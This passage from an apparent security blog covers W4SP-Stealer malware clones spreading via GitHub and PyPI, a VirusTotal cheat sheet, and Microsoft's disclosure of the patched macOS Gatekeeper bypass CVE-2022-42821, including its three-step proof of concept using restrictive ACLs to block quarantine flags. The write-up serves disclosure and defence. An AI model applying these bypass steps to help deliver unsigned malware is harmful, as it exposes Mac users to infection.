    It was discovered that several copies of W4SP-Stealer started flashing under different names as soon as the repo for W4SP-Stealer was removed. This new stealer is even being distributed through PyPI by threat actors already, which is a sign that it is becoming a real threat.

    It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

    • Satan Stealer
    • angel-stealer

    There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

    W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.

    There will be a constant increase in their number of attempts, their persistence, and their sophistication as time passes. However, Phylum ensured that it would mitigate and block supply chain attacks since its platform is capable enough in doing so.

    Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

    Tags: Information Stealer Malware


    Dec 21 2022

    VirusTotal INTELLIGENCE CHEAT SHEET

    Category: Antivirus,Cheat Sheet,MalwareDISC @ 9:21 am

    VirusTotal cheat sheet makes it easy to search for specific results

    Opening the Blackbox of VirusTotal, analyzing online phishing scan engines

    The Antivirus Hacker’s Handbook

    Mastering Malware Analysis

    Infosec books | InfoSec tools | InfoSec services

    Tags: VirusTotal, VirusTotal INTELLIGENCE CHEAT SHEET


    Dec 20 2022

    Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS

    Category: Bug Bounty,MalwareDISC @ 11:02 am

    Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper.

    Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature.

    The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasn’t signed by an Apple developer, you will not be able to run apps that weren’t downloaded from Apple’s store if the device is not jailbreaked of course.

    The flaw was discovered on July 27, 2022, by Jonathan Bar Or from Microsoft, it is a logic issue that was addressed with improved checks.

    “On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”.” reads the post published by Microsoft.

    Microsoft researchers explained that Gatekeeper bypasses can be used by threat actors to install malware on macOS systems.

    The experts pointed out that Apple’s Lockdown Mode introduced in July does not prevent the exploitation of the Achilles bug.

    The Achilles vulnerability relies on the Access Control Lists (ACLs) permission model to add extremely restrictive permissions to a downloaded file (i.e., “everyone deny write, writeattr, writeextattr, writesecurity, chown”), to block the Safari browser from setting the quarantine extended attribute.

    Below is the POC developed by Microsoft:

    1. Create a fake directory structure with an arbitrary icon and payload.
    2. Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of “everyone deny write,writeattr,writeextattr,writesecurity,chown”). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
    3. Create an archive with the application alongside its AppleDouble file and host it on a web server.
    Gatekeeper bypass.png

    while video POC is available here.

    Tags: Gatekeeper Bypass bug


    Next Page »